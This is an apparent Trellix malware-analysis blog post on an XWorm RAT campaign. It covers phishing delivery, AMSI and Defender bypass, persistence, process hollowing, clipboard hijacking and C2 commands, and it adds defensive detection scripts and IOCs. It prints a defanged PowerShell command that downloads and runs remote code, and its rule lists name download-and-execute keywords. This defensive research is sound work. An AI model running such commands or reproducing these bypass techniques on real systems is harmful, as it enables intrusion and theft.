
Old Loader, New Threat: Exploring XWorm RAT's Distribution and Tactics

Executive Summary:

In March-April 2023, we detected a malicious email campaign delivering the .Net-based XWorm RAT, in which embedded blogspot.com URLs were used as the entry point. These URLs redirect to a multilayer distribution chain that uses obfuscated PowerShell code to deliver XWorm as the final payload. Both “XWormV2.1” and “XWormV3.1” were used in this campaign.

One of the XWorm payloads contained hardcoded cryptocurrency wallet addresses. The intent was to hijack the clipboard and replace legitimate cryptocurrency addresses with fraudulent ones, resulting in the theft of crypto coins from victims. During our analysis, we noticed the exact same crypto ID was used in a 2021 campaign from AgentTesla, which suggests that the same threat actors are still active and running campaigns with different tools. The distribution mechanism is also reminiscent of past trends, with attackers abusing blogspot.com as the initial vector.

XWorm Seller’s Information:

Fig 1. XWorm and few other tools hosted for sale.


Fig 2. Telegram group to provide latest updates on tools.


Fig 3. Latest XWorm variants are sold on Shoppy instance.


Xcoders/Evilcoder are actively selling various versions of XWorm RAT through digital marketplaces, and details can be found on their Telegram (XcoderGroup) channel. The latest variants of XWorm, v4.1, v4.2 and v5.0, are being sold for $400.

Delivery Mechanism:

Fig 4.1 Delivery Mechanism

We found social engineering emails with pdf, docx and rtf attachments. The email lures were mostly themed around business interactions such as requests for quotes, invoices, or purchase orders. A deceived victim would open the attachment, click on the embedded URL, and launch the downloaded script.

The campaign used blogspot.com URLs pointing to scripts and PowerShell code to download and execute additional payloads as well as to establish persistence. Similar techniques were seen in past campaigns.

Analysis:

Figure 5 shows some of the emails that we observed in this campaign. Trellix Email Security was able to successfully detect this email campaign and safeguard users.

Fig 5. Email samples we observed in this campaign

Some PDF samples had fake alert screens with an error message and a "Reload" button. Clicking on the button leads the victim to the blogspot.com URL.

Fig 6. Fake alert prompt.

“hxxps://adobeupdate2023[.]blogspot[.]com/atom[.]xml”

The embedded blogspot.com URL redirected to a location that hosts an obfuscated JS/HTA/VBS file. Executing the obfuscated file downloads and runs PowerShell code.

“hxxps://download2431.mediafire.com/o7khka7z7uxgxXFo9SrPO7wP0cQwlUtJopql7s PYu3y5km5nQCrqO0tfHsvP8gHpJy7pFWUtQVWCag6RRTAapOY9w/zfilcaiw6chd9hu/invoice-1588307354.pdf.js”

Observed delivery mechanism in analysed sample.

Fig 4.2 Delivery mechanism observed in analysed sample


Fig 7 shows the content hosted on the above URL.

The following PowerShell code gets executed from the JS:

PowerShell.exe -eP Bypass -c (I'w'r('hxxps://updatepower2023.blogspot.com/atom.xml') -useB) | .('{1}{$}'.replace('$','0')-f'!','I').replace('!','ex') | ping 127.0.0.1

Upon visiting the URL in a browser, we observed that it navigated to hosted text content containing the PowerShell code.

hxxps://updatepower2023.blogspot.com/atom.xml redirected to the following URL: hxxps://529f38d0-3744-4286-b484be860d475d25[.]usrfiles[.]com/ugd/529f38_6521c5ccbd8d46acb81ce3eb5cc3cc56[.]txt
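
The launcher command shown earlier hides "Iwr" and "Iex" behind quote insertion, a format string and .replace() calls, so keyword matching on the raw command line misses them. The following is an added example (not code from the original post or from Trellix) that folds those constant string expressions and then applies simple detection rules; the function and rule names are hypothetical, and the folding covers only the obfuscation forms seen in this command.

```python
import re

# Command line exactly as printed in this post (URL left defanged).
SAMPLE = (r"PowerShell.exe -eP Bypass -c (I'w'r('hxxps://updatepower2023.blogspot.com/atom.xml') -useB)"
          r" | .('{1}{$}'.replace('$','0')-f'!','I').replace('!','ex') | ping 127.0.0.1")

LIT = r"'([^']*)'"  # single-quoted PowerShell string literal
RE_REPLACE = re.compile(LIT + r"\.replace\(\s*" + LIT + r"\s*,\s*" + LIT + r"\s*\)", re.I)
RE_FORMAT = re.compile(LIT + r"\s*-f\s*((?:'[^']*'\s*,\s*)*'[^']*')", re.I)
RE_PARENS = re.compile(r"\(\s*('[^']*')\s*\)(?=\s*\.replace\()", re.I)
RE_SPLIT_WORD = re.compile(r"(?<=\w)'(\w+)'(?=\w)")  # I'w'r -> Iwr

def _fold_format(m):
    """Evaluate 'fmt' -f 'a','b' for constant arguments."""
    args = re.findall(LIT, m.group(2))
    def pick(ph):
        i = int(ph.group(1))
        return args[i] if i < len(args) else ph.group(0)
    return "'" + re.sub(r"\{(\d+)\}", pick, m.group(1)) + "'"

def normalise(cmd):
    """Fold constant .replace() / -f expressions until nothing changes."""
    prev = None
    while prev != cmd:
        prev = cmd
        cmd = RE_REPLACE.sub(
            lambda m: "'" + m.group(1).replace(m.group(2), m.group(3)) + "'", cmd)
        cmd = RE_FORMAT.sub(_fold_format, cmd)
        cmd = RE_PARENS.sub(r"\1", cmd)
    return RE_SPLIT_WORD.sub(r"\1", cmd)

# Hypothetical rule set; matches both live and defanged ("[.]") URLs.
RULES = {
    "execution_policy_bypass": r"\s-(?:ep|ex\w*)\s+bypass\b",
    "web_download": r"\b(?:iwr|invoke-webrequest)\b",
    "dynamic_invoke": r"\b(?:iex|invoke-expression)\b",
    "blogspot_feed_url": r"blogspot(?:\[\.\]|\.)com/atom(?:\[\.\]|\.)xml",
}

def flags(cmd):
    """Names of the rules that match a command line, sorted."""
    return sorted(name for name, rx in RULES.items() if re.search(rx, cmd, re.I))

if __name__ == "__main__":
    print("raw       :", flags(SAMPLE))
    print("normalised:", flags(normalise(SAMPLE)))
    print(normalise(SAMPLE))
```

Run against the raw string, only the execution-policy and URL rules fire; the download and invoke rules match only after normalisation.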

Figure 8 shows the final PowerShell script in the chain:

Fig 8. Hosted PowerShell script over URL

Analysis of the PowerShell Script:

Fig 9. PowerShell Script wipes the traces and creates folder for persistence.

The PowerShell code begins by terminating the Word process and deleting DOC files from the Downloads and Desktop folders. It then creates the MEMEMAN folder to store its tools.

The $NuclearDefusion code shown in Fig 10 is stored at C:\ProgramData\MEMEMAN\CypherDeptography.~+~ and is executed.

Fig 10. PowerShell code of $NuclearDefusion variable.

The variable $AMSISSISISI contains the obfuscated code to bypass AMSI protection and Windows Defender by adding manual exclusions.

AMSI Bypass

Fig 11. AMSI Bypass

The PowerShell script uses a well-known method to bypass AMSI protection by manually setting the “amsiInitFailed” flag.

Windows Defender Bypass

The code snippet below shows various exclusion settings for extensions, paths, and processes to avoid detection by Windows Defender. It also terminates and deletes Windows Defender services, creates a local administrator user named "system32," and grants it RDP access.

Fig 12. Windows Defender path exclusion and user creation.

Persistence

In the Fig 10 code snippet of $NuclearDefusion, the code from variable $CHOTAbheem writes code to the file "C:\ProgramData\MEMEMAN\WINDOWSdefen.js" for persistence purposes. This code is designed to execute the PowerShell content of the file named "CypherDeptography.~+~" which was stored earlier. The "EscansUpdate" task is scheduled using the task scheduler to run WINDOWSdefen.js.

Fig 13. Code snippet schedules a Task

The code below contains a hex-encoded .Net loader that has been obfuscated with DeepSea 4.1. This loader injects the XWorm payload into various legitimate processes, which allows XWorm to run within the context of those processes.

Fig 14. .Net loader DLL executes XWorm payload

The code snippet above has a function called "gippler" that loads the .Net DLL to initiate the payload. To inject the content of the variable "$MEME2026" (which represents the executable for XWorm v3.1), the "A.B.C" method is invoked with the path of one of the legitimate executables listed below.

.Net loader DLL - D5887A373E8122365CBC546B13FADBD7

The argument content is loaded into the following files, respectively:

  1. C:\Windows\Microsoft.NET\Framework\v4.0.30319\Regsvcs.exe
  2. C:\Windows\Microsoft.NET\Framework\v2.0.50727\Regsvcs.exe
  3. C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe

Process hollowing is used to load the XWorm payload.

Fig 15. DLL function used for XWorm execution.

The stored API names after partial de-obfuscation of the DLL are shown below.

Fig 16. API names after the partial de-obfuscation.

After XWorm payload execution, the PowerShell code executes the content of the $KIMBERTOOL and $shakalakaboomboom variables, which serves to decode code that is stored in C:\ProgramData\MEMEMAN\REALENGINEUPDATE.js and UpdateEscan.js. This decoded code then downloads and runs content from a BlogSpot URL. The downloaded content repeats a series of actions, including stopping Windows Defender services and AMSI, and ultimately delivers XWorm as the end payload. This appears to provide an additional layer of persistence.

Fig 17. PowerShell code creates persistence.
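
The host artifacts described in this section can be hunted for together in endpoint telemetry. This added example (not part of the original post) correlates constructed Sysmon, Security and Defender events per host against the MEMEMAN folder, the EscansUpdate task, the "system32" account, Defender exclusion changes and connections to port 5002; the flat event schema, function names and sample records are assumptions.

```python
from collections import defaultdict

# Constructed sample telemetry. The flat field names ("src", "id", ...) are an
# assumed, simplified schema; map them from your own Sysmon/Security/Defender export.
EVENTS = [
    {"host": "WS01", "src": "sysmon", "id": 11,
     "path": r"C:\ProgramData\MEMEMAN\CypherDeptography.~+~"},
    {"host": "WS01", "src": "security", "id": 4698, "task": r"\EscansUpdate"},
    {"host": "WS01", "src": "security", "id": 4720, "user": "system32"},
    {"host": "WS01", "src": "defender", "id": 5007,
     "value": r"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData"},
    {"host": "WS01", "src": "sysmon", "id": 3, "dest_port": 5002,
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Regsvcs.exe"},
    {"host": "WS02", "src": "security", "id": 4698,
     "task": r"\Microsoft\Office\OfficeTelemetryAgentLogOn"},
    {"host": "WS02", "src": "sysmon", "id": 3, "dest_port": 443,
     "image": r"C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"},
    {"host": "WS03", "src": "security", "id": 4720, "user": "system32"},
]

STAGING_DIR = "c:\\programdata\\mememan\\"       # folder the script creates
HOLLOW_TARGETS = ("regsvcs.exe", "msbuild.exe")  # processes the loader injects into
C2_PORT = 5002                                   # C2 port reported in this post

def indicators(ev):
    """Return the set of indicator names that a single event matches."""
    kind, hits = (ev["src"], ev["id"]), set()
    if kind == ("sysmon", 11) and ev.get("path", "").lower().startswith(STAGING_DIR):
        hits.add("mememan_staging_file")          # Sysmon FileCreate
    if kind == ("security", 4698) and ev.get("task", "").lstrip("\\").lower() == "escansupdate":
        hits.add("escansupdate_task")             # scheduled task created
    if kind == ("security", 4720) and ev.get("user", "").lower() == "system32":
        hits.add("local_user_system32")           # user account created
    if kind == ("defender", 5007) and "\\windows defender\\exclusions\\" in ev.get("value", "").lower():
        hits.add("defender_exclusion_added")      # Defender configuration changed
    if (kind == ("sysmon", 3) and ev.get("dest_port") == C2_PORT
            and ev.get("image", "").lower().endswith(HOLLOW_TARGETS)):
        hits.add("dotnet_tool_to_port_5002")      # Sysmon NetworkConnect
    return hits

def triage(events, threshold=2):
    """Group indicator hits per host; report hosts with >= threshold distinct hits."""
    per_host = defaultdict(set)
    for ev in events:
        per_host[ev["host"]] |= indicators(ev)
    return {h: sorted(i) for h, i in per_host.items() if len(i) >= threshold}

if __name__ == "__main__":
    for host, hits in triage(EVENTS).items():
        print(host, hits)
```

Requiring two or more distinct indicators keeps a lone weak signal, such as a Defender exclusion change on its own, from raising a host.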

Analysis of XWorm:

As mentioned earlier, the variable "$MEME2026" contains the payload for XWorm v3.1. This payload is heavily obfuscated, adding an extra layer of complexity to its analysis.

Fig 18. Hex coded XWorm payload in PowerShell code


Fig 19. Basic characteristics of payload

Upon execution, the malware sleeps for one second, and then attempts to create a mutex (“AEElwlFaEu3hAU65”). If the code fails to create a mutex, the malware terminates.

This code also checks for debuggers as shown below:

Fig 20. Anti Debugging Check

Resolving Encrypted Strings

The analysed XWorm payload has hardcoded base64 & AES encrypted strings that get decrypted during execution. The strings include the host, port, encryption key, mutex name, and Bitcoin wallet addresses.

Fig 21. Code to resolve encrypted variables


Fig 22. Decrypted variables

Keylogging function

The code snippet below highlights the keylogger functionality, which extracts the keystrokes of the user. Furthermore, the XLogger module performs additional operations such as getting the keyboard state, keyboard layout, and the active window.

Fig 23. Keylogging Functionality

Clipboard Hijacking

We have observed an instance of clipboard hijacking where a listener is created to monitor changes in the clipboard using the AddClipboardFormatListener() method. The GetText() and SetText() methods are used to retrieve and set the clipboard content, respectively. Clipboard content is matched against a set of regular expressions, shown below, to look for crypto currency wallet addresses. If an address is found, it is overwritten with one of the attacker-owned addresses.

Fig 24.1. Code to add clipboard listener


Fig 24.2. Replace clipboard content with attacker’s wallet IDs

Bitcoin, TRC20, and Ethereum wallet IDs are targeted and replaced with ones below:

BTC: 3CghDNiD2J5xsS9i1wzwbvwdTJxokqGCmC
ETH: 0x8af86e2c7126d08387e71ec6699bc69f957cdee6
TRC20: TEoYgXKbx5nKq3i6jB2KsHby93bWQuKi1C

During OSINT gathering, we came across information that suggests the use of the same Bitcoin (BTC) address in a previous campaign known as the “Aggah campaign” which surfaced around August 2021. The same Bitcoin (BTC) wallet address was observed in a similar campaign that utilized AgentTesla and AveMaria as payloads in Jan 2022. This finding implies that the threat actors involved in the previous campaign are still active and conducting attacks using new payloads. However, they continue to employ the same old BTC wallet ID to steal cryptocurrency coins, and this BTC wallet has recent transactions, as per blockchain explorers.

Fig 25. Transactions on observed BTC address

After clipboard hijacking, the code verifies the status of the victim's network. If the network is active, the BeginConnect() method establishes a socket connection with the command-and-control (C2) server.

C2 Host: "updateccdata[.]duckdns.org", Port: 5002

Fig 26. BeginConnect() method creates socket connection for further communication

After establishing a connection with the C2 server, the malicious code calls the ClientSocket.info() function to gather the system information of the target, which will be utilized for subsequent actions.

Fig 27. Collection of system information

ClientSocket.info() retrieves information and returns an array containing the retrieved data.

Fig 28. Collected system information

ClientSocket.Send() encrypts the collected information with AES and sends it to the C2 server.

Fig 29. AES encryption of collected information.

Upon sending the collected data, the code calls ClientSocket.BeginReceive() and waits for a response from the C2 server to perform further actions.

Fig 30. Call to BeginReceive function to get C2 response

A successful response from the C2 server is expected to be encrypted using AES in ECB mode. After decryption, the response is a sequence of words delimited by "<Xwormmm>"; the first word is the command to execute, and the remaining elements are its arguments.

Fig 31. Function to decode C2 response

Fig 32. C2 Commands

Below is the list of C2 commands and their usage:

| Command | Usage (C2 response has argument for the execution) |
| --- | --- |
| rec | Restarts application |
| CLOSE | Close the application |
| uninstall | Write and execute a batch file to remove current process executable from start-up folder and close the application. |
| update | Execute uninstall command functions and start a new process with executable code from a C2 argument. |
| DW | Write and execute PowerShell content received as an argument from C2. |
| FM | Invokes the content of argument memory stream into the current process. |
| LN | Download file from argument URL and execute it. |
| Urlopen | Create GET request for argument URL and open it with browser. |
| Urlhide | Create GET request for argument URL and open it within existing process. |
| PCShutdown | Execute shutdown command “shutdown.exe /f /s /t 0” |
| PCRestart | Execute restart command “shutdown.exe /f /r /t 0” |
| PCLogoff | Execute logoff command “shutdown.exe -L” |
| StartDDos | Create thread to perform repeated POST request to the provided host and port. The function will repeat this action every 2.5 seconds until the specified time limit is reached. Host, port, and time limit are provided as arguments. |
| StopDDos | Stops DDos thread. |
| StartReport | Create thread to compare running processes title with provided list. If it matches, send message to C2. |
| StopReport | Stops StartReport thread. |
| Xchat / ngork | Send concatenated system hardware information related to C2 to provide further actions. OS name, username, drive info, processor info, etc. |
| DDos | Resend “DDos” message to C2. (Might be used to check active victims) |
| Plugin | Same as Plugin command, but decrypted argument file content is stored in registry. Registry key string is generated using system information. |
| OfflineGet | XWorm payload writes logs to log.tmp file. Content of this file is sent to C2 on this command execution. |
| $Cap | Takes screenshot and sends it to C2 as memory stream. |
| MessageBox | Display argument message from C2 as message box. |

The "Plugin" command retrieves and loads content from the C2 response. It is expected as .NET compiled code with multiple methods. These method names are compared with various values, including "ENC" and "DEC". Based on information from the seller's web site, we believe that these methods may represent ransomware encryption and decryption.

Fig 33. Method name string comparison with “ENC” and “DEC”.

Fig 34. Ransomware functionality from XWorm builder

Conclusion:

This blog took a deep dive into the XWorm malware campaign. We observed that XWorm RAT can steal crypto coins, and also has the ability to carry out ransomware attacks. The malware is distributed using a multi-layered approach, utilizing legitimate websites and obfuscated PowerShell scripts. This distribution method has been previously seen in campaigns involving AgentTesla and RevengeRat, among others. These findings show that this malware campaign is sophisticated and persistent, highlighting the importance of strong security measures to protect against such threats.

Telemetry:

We observed that the United States, South Korea, and Germany were the primary countries where most of the detections were seen, as depicted in Figure 35. Also, the service/consulting, transport, and healthcare sectors had the highest number of detections, as illustrated in Figure 36.

Fig 35. XWorm event detections by region

Fig 36. XWorm event detections by industry

Trellix product coverage:

Network Security (NX)
Detection as a Service
Email Security
Malware Analysis
File Protect
FE_Trojan_MSIL_Generic_292
FEC_Exploit_OOXML_Generic_8
FE_Backdoor_MSIL_Generic_14
Trojan.XWorm
Suspicious Network By PowerShell
Suspicious Network Activity
Suspicious Process Launching Activity
Suspicious Process PowerShell Activity
fe_ml_heuristic
Endpoint Security (HX)
Trojan.Agent.GFIT
Trojan.GenericKD.67803158
Gen:Variant.Marsilia.8687
Trojan.GenericKD.65526506
Trojan.JS.Agent.UTQ
Trojan.GenericKD.66156681
IL:Trojan.MSILZilla.25629
Trojan.GenericKD.65851153
Generic.mg.d0208a3ac5581e6b
Generic.mg.fb1fd4ace84756ed
Generic.mg.6ced4f98cd34cc2e
Endpoint Security (ENS)
Trojan-FVHU!B05C9ACBCEFE (trojan)
Trojan-FVHU!D5887A373E81 (trojan)
XWorm!6CED4F98CD34 (trojan)
Trojan-FVHW!D0208A3AC558 (trojan)
JS/Agent.go (trojan)
W97M/Macroless.aa (trojan)
PS/Downloader.ha (trojan)

IOCs:


Urls & C2:


Wallet IDs:

BTC: 3CghDNiD2J5xsS9i1wzwbvwdTJxokqGCmC
ETH: 0x8af86e2c7126d08387e71ec6699bc69f957cdee6
TRC20: TEoYgXKbx5nKq3i6jB2KsHby93bWQuKi1C
This document and the information contained herein describes computer security research for educational purposes only and the convenience of Trellix customers.
